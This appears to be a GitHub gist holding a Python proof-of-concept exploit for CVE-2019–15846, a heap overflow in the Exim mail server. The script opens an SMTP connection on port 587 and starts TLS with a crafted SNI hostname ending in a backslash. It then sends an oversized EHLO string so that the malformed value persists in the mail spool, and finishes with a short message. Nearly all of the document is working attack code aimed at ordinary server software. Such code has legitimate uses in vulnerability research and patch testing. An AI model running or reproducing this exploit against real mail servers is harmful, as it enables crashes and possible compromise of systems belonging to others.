Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2019–15846
import socket
import struct
import ssl
HOST = '127.0.0.1'
PORT = 587
context = ssl._create_unverified_context()
context.options |= ssl.PROTOCOL_TLSv1_2 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_COMPRESSION
# payload must have length multiple of target system alignment - 1
payload = ""
payload += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A"
payload += "c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
payload += "2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3"
payload += "Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai"
payload += "\\"
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
print(s.recv(1024))
s.send(b'EHLO [127.0.0.1]\r\n')
print(s.recv(1024))
s.send(b'STARTTLS\r\n')
print(s.recv(1024))
with context.wrap_socket(s, server_hostname=payload) as conn:
# This will persist in the spool
conn.send(b"EHLO " + b"E"*0x3600 + b"\r\n")
print(conn.recv(1024))
# Sending message
conn.send(b'MAIL FROM: root@example.com\r\n')
conn.send(b'RCPT TO: root@example.com\r\n')
conn.send(b'DATA\r\n')
conn.send(b'SUBJECT: root\r\n')
conn.send(b'blabla\r\n')
conn.send(b'\r\n')
conn.send(b'.\r\n')
conn.send(b'\r\n')
conn.send(b'QUIT\r\n')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.